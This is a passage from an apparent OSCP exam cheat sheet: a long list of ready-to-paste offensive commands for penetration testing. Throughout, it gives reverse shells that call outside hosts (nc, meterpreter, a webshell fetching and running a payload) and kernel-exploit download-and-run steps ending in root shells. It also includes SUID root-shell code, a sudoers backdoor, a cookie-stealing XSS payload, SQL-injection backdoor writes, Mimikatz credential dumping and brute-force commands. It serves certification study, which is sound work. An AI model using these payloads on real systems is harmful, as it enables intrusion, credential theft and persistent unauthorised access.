      https://github.com/cldrn/davtest

      You can also upload a file using the PUT method with the curl command:

      curl -T 'leetshellz.txt' 'http://$ip'

      And rename it to an executable file using the MOVE method with the curl command:

      curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'
    • Upload shell using limited php shell cmd
      use the webshell to download and execute the meterpreter
      [curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php
      [curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php
      curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php

    • TFTP
      mkdir /tftp
      atftpd --daemon --port 69 /tftp
      cp /usr/share/windows-binaries/nc.exe /tftp/
      EX. FROM WINDOWS HOST:
      C:\Users\Offsec>tftp -i $ip get nc.exe

    • FTP
      apt-get update && apt-get install pure-ftpd

      !/bin/bash

      groupadd ftpgroup
      useradd -g ftpgroup -d /dev/null -s /etc ftpuser
      pure-pw useradd offsec -u ftpuser -d /ftphome
      pure-pw mkdb
      cd /etc/pure-ftpd/auth/
      ln -s ../conf/PureDB 60pdb
      mkdir -p /ftphome
      chown -R ftpuser:ftpgroup /ftphome/

      /etc/init.d/pure-ftpd restart

  • ## Packing Files

Privilege Escalation

Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.

  • ## Linux Privilege Escalation

  • Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

  • Try the obvious - Maybe the user is root or can sudo to root:

    id

    sudo su
  • Here are the commands I have learned to use to perform linux enumeration and privledge escalation:

    What users can login to this box (Do they use thier username as thier password)?:

    grep -vE "nologin|false" /etc/passwd

    What kernel version are we using? Do we have any kernel exploits for this version?

    uname -a

    searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"

    What applications have active connections?:

    netstat -tulpn

    What services are running as root?:

    ps aux | grep root

    What files run as root / SUID / GUID?:

     find / -perm +2000 -user root -type f -print
     find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
     find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
     find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
     find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
     for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done  
     find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
    

    What folders are world writeable?:

     find / -writable -type d 2>/dev/null      # world-writeable folders
     find / -perm -222 -type d 2>/dev/null     # world-writeable folders
     find / -perm -o w -type d 2>/dev/null     # world-writeable folders
     find / -perm -o x -type d 2>/dev/null     # world-executable folders
     find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writeable & executable folders
    
  • There are a few scripts that can automate the linux enumeration process:

    • Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course.
    • LinuxPrivChecker.py - My favorite automated linux priv enumeration checker -

      https://www.securitysift.com/download/linuxprivchecker.py

    • LinEnum - (Recently Updated)

    https://github.com/rebootuser/LinEnum * linux-exploit-suggester (Recently Updated)

    https://github.com/mzet-/linux-exploit-suggester * Highon.coffee Linux Local Enum - Great enumeration script!

    `wget https://highon.coffee/downloads/linux-local-enum.sh`
    
    • Linux Privilege Exploit Suggester (Old has not been updated in years)

    https://github.com/PenturaLabs/LinuxExploitSuggester * Linux post exploitation enumeration and exploit checking tools

    https://github.com/reider-roque/linpostexp

Handy Kernel Exploits

  • CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)

    https://www.exploit-db.com/exploits/14814/

     wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
     $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
     $ ./i-can-haz-modharden
     [+] launching root shell!
     # id
     uid=0(root) gid=0(root)
    
  • CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
    https://www.exploit-db.com/exploits/15285/

  • CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
    https://git.zx2c4.com/CVE-2012-0056/about/
    Linux CVE 2012-0056

      wget -O exploit.c http://www.exploit-db.com/download/18411 
      gcc -o mempodipper exploit.c  
      ./mempodipper
    
  • CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
    https://dirtycow.ninja/
    First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016

  • Run a command as a user other than root

      sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf
    
  • Add a user or change a password

      /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor  
      echo thePassword | passwd haxzor --stdin
    
  • Local Privilege Escalation Exploit in Linux

    • SUID (Set owner User ID up on execution)
      Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

      below are some quick copy and paste examples for various shells:

        SUID C Shell for /bin/bash  
      
      

      int main(void){
      setresuid(0, 0, 0);
      system("/bin/bash");
      }

      SUID C Shell for /bin/sh

      int main(void){
      setresuid(0, 0, 0);
      system("/bin/sh");
      }

      Building the SUID Shell binary
      gcc -o suid suid.c
      For 32 bit:
      gcc -m32 -o suid suid.c

    • Create and compile an SUID from a limited shell (no file transfer)

        echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c  
        gcc privsc.c -o privsc
      
  • Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:

    echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
  • You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on port 4444.

     set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
     echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
     chmod +x ssh
    
  • SearchSploit

          searchsploit –uncsearchsploit apache 2.2  
          searchsploit "Linux Kernel"  
          searchsploit linux 2.6 | grep -i ubuntu | grep local  
          searchsploit slmail
    
  • Kernel Exploit Suggestions for Kernel Version 3.0.0

    ./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0
  • Precompiled Linux Kernel Exploits - Super handy if GCC is not installed on the target machine!

    https://www.kernel-exploits.com/

  • Collect root password

    cat /etc/shadow |grep root
  • Find and display the proof.txt or flag.txt - LOOT!

        cat `find / -name proof.txt -print`
    
  • ## Windows Privilege Escalation

  • Windows Privilege Escalation resource http://www.fuzzysecurity.com/tutorials/16.html

  • Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

  • Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:

    whoami

    net user "%username%"
  • Try the getsystem command using meterpreter - rarely works but is worth a try.

    meterpreter > getsystem
  • No File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial and windowsprivesccheck.py).

    Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report:

     @echo --------- BASIC WINDOWS RECON ---------  > report.txt
     timeout 1
     net config Workstation  >> report.txt
     timeout 1
     systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt
     timeout 1
     hostname >> report.txt
     timeout 1
     net users >> report.txt
     timeout 1
     ipconfig /all >> report.txt
     timeout 1
     route print >> report.txt
     timeout 1
     arp -A >> report.txt
     timeout 1
     netstat -ano >> report.txt
     timeout 1
     netsh firewall show state >> report.txt    
     timeout 1
     netsh firewall show config >> report.txt
     timeout 1
     schtasks /query /fo LIST /v >> report.txt
     timeout 1
     tasklist /SVC >> report.txt
     timeout 1
     net start >> report.txt
     timeout 1
     DRIVERQUERY >> report.txt
     timeout 1
     reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
     timeout 1
     reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
     timeout 1
     dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt
     timeout 1
     findstr /si password *.xml *.ini *.txt >> report.txt
     timeout 1
     reg query HKLM /f password /t REG_SZ /s >> report.txt
     timeout 1
     reg query HKCU /f password /t REG_SZ /s >> report.txt 
     timeout 1
     dir "C:\"
     timeout 1
     dir "C:\Program Files\" >> report.txt
     timeout 1
     dir "C:\Program Files (x86)\"
     timeout 1
     dir "C:\Users\"
     timeout 1
     dir "C:\Users\Public\"
     timeout 1
     echo REPORT COMPLETE!
    
  • Windows Server 2003 and IIS 6.0 WEBDAV Exploiting http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html

     msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
    
    

    cadavar http://$ip dav:/> put aspshell.txt Uploading aspshell.txt to /aspshell.txt': Progress: [=============================&gt;] 100.0% of 38468 bytes succeeded. dav:/&gt; copy aspshell.txt aspshell3.asp;.txt Copying /aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded. dav:/> exit

    msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 1.2.3.4 msf exploit(handler) > set LPORT 80 msf exploit(handler) > set ExitOnSession false msf exploit(handler) > exploit -j

    curl http://$ip/aspshell3.asp;.txt

    [] Started reverse TCP handler on 1.2.3.4:443 [] Starting the payload handler... [] Sending stage (957487 bytes) to 1.2.3.5 [] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700

  • Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.

     pip install pyinstaller
     wget -O exploit.py http://www.exploit-db.com/download/31853  
     python pyinstaller.py --onefile exploit.py
    
  • Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:

    https://www.exploit-db.com/exploits/6705/

    https://github.com/Re4son/Churrasco

     c:\Inetpub>churrasco
     churrasco
     /churrasco/-->Usage: Churrasco.exe [-d] "command to run"
    
    

    c:\Inetpub>churrasco -d "net user /add " c:\Inetpub>churrasco -d "net localgroup administrators /add" c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" /ADD"

  • Windows MS11-080 - http://www.exploit-db.com/exploits/18176/

      python pyinstaller.py --onefile ms11-080.py  
      mx11-080.exe -O XP
    
  • Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:

    MS16-032 https://www.exploit-db.com/exploits/39719/

    powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
  • Powershell Priv Escalation Tools https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

  • Windows Run As - Switching users in linux is trival with the 

    SU
     command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.
    • Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).

       C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe" 
      
      

      PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com

    • Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:

       C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
       Enter the password for Test:
       Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
      
    • PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.

       $username = ''
       $password = ''
       $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
       $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
       Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public
      

      Next run this script using powershell.exe:

      powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"
  • Windows Service Configuration Viewer - Check for misconfigurations in services that can lead to privilege escalation. You can replace the executable with your own and have windows execute whatever code you want as the privileged user.
    icacls scsiaccess.exe

     scsiaccess.exe  
     NT AUTHORITY\SYSTEM:(I)(F)  
     BUILTIN\Administrators:(I)(F)  
     BUILTIN\Users:(I)(RX)  
     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)  
     Everyone:(I)(F)
    
  • Compile a custom add user command in windows using C

    [email protected]:~# cat useradd.c  
    #include  /* system, NULL, EXIT_FAILURE */  
    int main ()  
    {  
    int i;  
    i=system ("net localgroup administrators low /add");  
    return 0;  
    }
    

    i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
  • Group Policy Preferences (GPP)
    A common useful misconfiguration found in modern domain environments is unprotected Windows GPP settings files

    • map the Domain controller SYSVOL share

      net use z:\\dc01\SYSVOL
    • Find the GPP file: Groups.xml

      dir /s Groups.xml
    • Review the contents for passwords

      type Groups.xml
    • Decrypt using GPP Decrypt

      gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
  • Find and display the proof.txt or flag.txt - get the loot!

    #meterpreter > run post/windows/gather/win_privs
     
    cd\ & dir /b /s proof.txt
     
    type c:\pathto\proof.txt

Client, Web and Password Attacks

  • ## Client Attacks

  • ## Web Attacks

    • Web Shag Web Application Vulnerability Assessment Platform
      webshag-gui
    • Web Shells
      http://tools.kali.org/maintaining-access/webshells
      ls -l /usr/share/webshells/
    • Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
      weevely generate s3cr3t
      weevely http://$ip/weevely.php s3cr3t
    • Java Signed Applet Attack
    • HTTP / HTTPS Webserver Enumeration

      • OWASP Dirbuster
      • nikto -h $ip
    • Essential Iceweasel Add-ons
      Cookies Manager https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
      Tamper Data
      https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

    • Cross Site Scripting (XSS)
      significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more

    • Browser Redirection and IFRAME Injection

      <iframe SRC="http://$ip/report" height = "0" width="0">iframe>
    • Stealing Cookies and Session Information

      <javascript>  
      new image().src="http://$ip/bogus.php?output="+document.cookie;  
      </script>

      nc -nlvp 80

  • ## File Inclusion Vulnerabilities

    • Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code.
    • fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI):
      https://github.com/kurobeats/fimap

      • Gaining a shell from phpinfo()
        fimap + phpinfo() Exploit - If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.
    • For Local File Inclusions look for the include() function in PHP code.

      include("lang/".$_COOKIE['lang']); 
      include($_GET['page'].".php");
    • LFI - Encode and Decode a file using base64

      curl -s \
      "http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
      | grep -e '\[^\\ \]\\{40,\\}' | base64 -d
    • LFI - Download file with base 64 encoding
      http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php

    • LFI Linux Files:
      /etc/issue
      /proc/version
      /etc/profile
      /etc/passwd
      /etc/passwd
      /etc/shadow
      /root/.bash_history
      /var/log/dmessage
      /var/mail/root
      /var/spool/cron/crontabs/root

    • LFI Windows Files:
      %SYSTEMROOT%\repair\system
      %SYSTEMROOT%\repair\SAM
      %SYSTEMROOT%\repair\SAM
      %WINDIR%\win.ini
      %SYSTEMDRIVE%\boot.ini
      %WINDIR%\Panther\sysprep.inf
      %WINDIR%\system32\config\AppEvent.Evt

    • LFI OSX Files:
      /etc/fstab
      /etc/master.passwd
      /etc/resolv.conf
      /etc/sudoers
      /etc/sysctl.conf

    • LFI - Download passwords file
      http://$ip/index.php?page=/etc/passwd
      http://$ip/index.php?file=../../../../etc/passwd

    • LFI - Download passwords file with filter evasion
      http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd

    • Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte
      GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00

    • Contaminating Log Files 

      
      
    • For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files

      /etc/php5/cgi/php.ini - "allowurlfopen" and "allowurlinclude" both set to "on"

      include($_REQUEST["file"].".php");
    • Remote File Inclusion

      http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt

      
      
  • ## Database Vulnerabilities

    • Playing with SQL Syntax A great tool I have found for playing with SQL Syntax for a variety of database types (MSSQL Server, MySql, PostGreSql, Oracle) is SQL Fiddle:

    http://sqlfiddle.com

    Another site is rextester.com:

    http://rextester.com/l/mysqlonlinecompiler * Detecting SQL Injection Vulnerabilities.

    Most modern automated scanner tools use time delay techniques to detect SQL injection vulnerabilities. This method can tell you if a SQL injection vulnerability is present even if it is a "blind" sql injection vulnerabilit that does not provide any data back. You know your SQL injection is working when the server takes a LOooooong time to respond. I have added a line comment at the end of each injection statement just in case there is additional SQL code after the injection point.
    
    
    • MSSQL Server SQL Injection Time Delay Detection: Add a 30 second delay to a MSSQL Server Query

      • Original Query

        SELECT * FROM products WHERE name='Test';

      • Injection Value

        '; WAITFOR DELAY '00:00:30'; --

      • Resulting Query

        SELECT * FROM products WHERE name='Test'; WAITFOR DELAY '00:00:30'; --

    • MySQL Injection Time Delay Detection: Add a 30 second delay to a MySQL Query

      • Original Query

        SELECT * FROM products WHERE name='Test';

      • Injection Value

        '-SLEEP(30); #

      • Resulting Query

        SELECT * FROM products WHERE name='Test'-SLEEP(30); #

    • PostGreSQL Injection Time Delay Detection: Add a 30 second delay to an PostGreSQL Query

      • Original Query

        SELECT * FROM products WHERE name='Test';

      • Injection Value

        '; SELECT pg_sleep(30); --

      • Resulting Query

        SELECT * FROM products WHERE name='Test'; SELECT pg_sleep(30); --

    • Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password

        mysql -u root -p -h $ip
      use "Users"  
      show tables;  
      select \* from users;
      
    • Authentication Bypass

        name='wronguser' or 1=1;  
      name='wronguser' or 1=1 LIMIT 1;
      
    • Enumerating the Database

http://192.168.11.35/comment.php?id=738)'

Verbose error message?

http://$ip/comment.php?id=738 order by 1

http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6

Determine MySQL Version:

http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6

Current user being used for the database connection:

http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6

Enumerate database tables and column structures

http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables

Target the users table in the database

http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'

Extract the name and password

http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users

Create a backdoor

http://$ip/comment.php?id=738 union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
  • SQLMap Examples

  • Crawl the links

    sqlmap -u http://$ip --crawl=1

    sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
  • SQLMap Search for databases against a suspected GET SQL Injection

    sqlmap –u http://$ip/blog/index.php?search –dbs
  • SQLMap dump tables from database oscommerce at GET SQL injection

    sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps
  • SQLMap GET Parameter command

    sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5
  • SQLMap Post Username parameter

    sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all
  • SQL Map OS Shell

    sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell

    sqlmap -u http://$ip/login.php --method=POST --data="[email protected]&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell
  • Automated sqlmap scan

    sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
  • Targeted sqlmap scan

    sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
  • Scan url for union + error based injection with mysql backend and use a random user agent + database dump

    sqlmap -o -u http://$ip/index.php --forms --dbs

    sqlmap -o -u "http://$ip/form/" --forms
  • Sqlmap check form for injection

    sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump
  • Enumerate databases

    sqlmap --dbms=mysql -u "$URL" --dbs
  • Enumerate tables from a specific database

    sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
  • Dump table data from a specific database and table

    sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
  • Specify parameter to exploit

    sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2
  • Specify parameter to exploit in 'nice' URIs (exploits param1)

    sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs
  • Get OS shell

    sqlmap --dbms=mysql -u "$URL" --os-shell
  • Get SQL shell

    sqlmap --dbms=mysql -u "$URL" --sql-shell
  • SQL query

    sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"
  • Use Tor Socks5 proxy

    sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
  • NoSQLMap Examples You may encounter NoSQL instances like MongoDB in your OSCP journies (

    /cgi-bin/mongo/2.2.3/dbparse.py
    ). NoSQLMap can help you to automate NoSQLDatabase enumeration.
  • NoSQLMap Installation

    git clone https://github.com/codingo/NoSQLMap.git
    cd NoSQLMap/
    ls
    pip install couchdb
    pip install pbkdf2
    pip install ipcalc
    python nosqlmap.py
  • Often you can create an exception dump message with MongoDB using a malformed NoSQLQuery such as:

    a'; return this.a != 'BadData’'; var dummy='!
  • ## Password Attacks

    • AES Decryption
      http://aesencryption.net/
    • Convert multiple webpages into a word list

      for x in 'index' 'about' 'post' 'contact' ; do \
        curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \
      done
    • Or convert html to word list dict

      html2dic index.html.out | sort -u > index-html.dict
    • Default Usernames and Passwords

    • Brute Force

    • Dictionary Files

      • Word lists on Kali
        cd /usr/share/wordlists
    • Key-space Brute Force

      • crunch 6 6 0123456789ABCDEF -o crunch1.txt
      • crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
      • crunch 8 8 -t ,@@^^%%%
    • Pwdump and Fgdump - Security Accounts Manager (SAM)

      • pwdump.exe
         - attempts to extract password hashes
      • fgdump.exe
         - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.
    • Windows Credential Editor (WCE)

      • allows one to perform several attacks to obtain clear text passwords and hashes. Usage: 
        wce -w
    • Mimikatz

      • extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets
        https://github.com/gentilkiwi/mimikatz From metasploit meterpreter (must have System level access):

        meterpreter> load mimikatz
        meterpreter> help mimikatz
        meterpreter> msv
        meterpreter> kerberos
        meterpreter> mimikatz_command -f samdump::hashes
        meterpreter> mimikatz_command -f sekurlsa::searchPasswords
        
    • Password Profiling

      • cewl can generate a password list from a web page
        cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
    • Password Mutating

      • John the ripper can mutate password lists
        nano /etc/john/john.conf
        john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
    • Medusa

      • Medusa, initiated against an htaccess protected web directory
        medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
    • Ncrack

      • ncrack (from the makers of nmap) can brute force RDP
        ncrack -vv --user offsec -P password-file.txt rdp://$ip
    • Hydra

      • Hydra brute force against SNMP

        hydra -P password-file.txt -v $ip snmp
      • Hydra FTP known user and rockyou password list

        hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp
      • Hydra SSH using list of users and passwords

        hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
      • Hydra SSH using a known password and a username list

        hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh
      • Hydra SSH Against Known username on port 22

        hydra $ip -s 22 ssh -l  -P big_wordlist.txt
      • Hydra POP3 Brute Force

        hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
      • Hydra SMTP Brute Force

        hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
      • Hydra attack http get 401 login with a dictionary

        hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
      • Hydra attack Windows Remote Desktop with rockyou

        hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
      • Hydra brute force SMB user with rockyou:

        hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
      • Hydra brute force a Wordpress admin login

        hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
  • ## Password Hash Attacks

    apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev

    and

    apt-get install pocl-opencl-icd

    Cracking Linux Hashes - /etc/shadow file

     500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
    3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
    7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
    1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems
    

    Cracking Windows Hashes

    3000 | LM                                               | Operating-Systems
    1000 | NTLM                                             | Operating-Systems
    

    Cracking Common Application Hashes

      900 | MD4                                              | Raw Hash
        0 | MD5                                              | Raw Hash
     5100 | Half MD5                                         | Raw Hash
      100 | SHA1                                             | Raw Hash
    10800 | SHA-384                                          | Raw Hash
     1400 | SHA-256                                          | Raw Hash
     1700 | SHA-512                                          | Raw Hash
    

    Create a .hash file with all the hashes you want to crack puthasheshere.hash: 

    $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/

    Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:

    hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt

    Wordpress sample hash: 

    $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/

    Wordpress clear text: 

    test

    Hashcat example cracking Wordpress passwords using rockyou:

    hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt
    * Sample Hashes
    http://openwall.info/wiki/john/sample-hashes * Identify Hashes
    `hash-identifier`
    
    • To crack linux hashes you must first unshadow them:

      unshadow passwd-file.txt shadow-file.txt

      unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
  • John the Ripper - Password Hash Cracking

    • john $ip.pwdump
    • john --wordlist=/usr/share/wordlists/rockyou.txt hashes
    • john --rules --wordlist=/usr/share/wordlists/rockyou.txt
    • john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
    • JTR forced descrypt cracking with wordlist

      john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
    • JTR forced descrypt brute force cracking

      john --format=descrypt hash --show
  • Passing the Hash in Windows

    • Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:

      export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896

      pth-winexe -U administrator //$ip cmd
  • Networking, Pivoting and Tunneling

    • Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

      • apt-get install rinetd
      • cat /etc/rinetd.conf
        # bindadress bindport connectaddress connectport
        w.x.y.z 53 a.b.c.d 80
        
    • SSH Local Port Forwarding: supports bi-directional communication channels

      • ssh  -L ::
    • SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network

      • ssh  -R ::
    • SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT

      • ssh -D  -p  
    • Proxychains - Perform nmap scan within a DMZ from an external computer

      • Create reverse SSH tunnel from Popped machine on :2222

        ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com
         
        ssh -f -N -R 2222::22 [email protected]
      • Create a Dynamic application-level port forward on 8080 thru 2222

        ssh -f -N -D :8080 -p 2222 [email protected]
      • Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains

        proxychains nmap --top-ports=20 -sT -Pn $ip/24
    • HTTP Tunneling

      nc -vvn $ip 8888
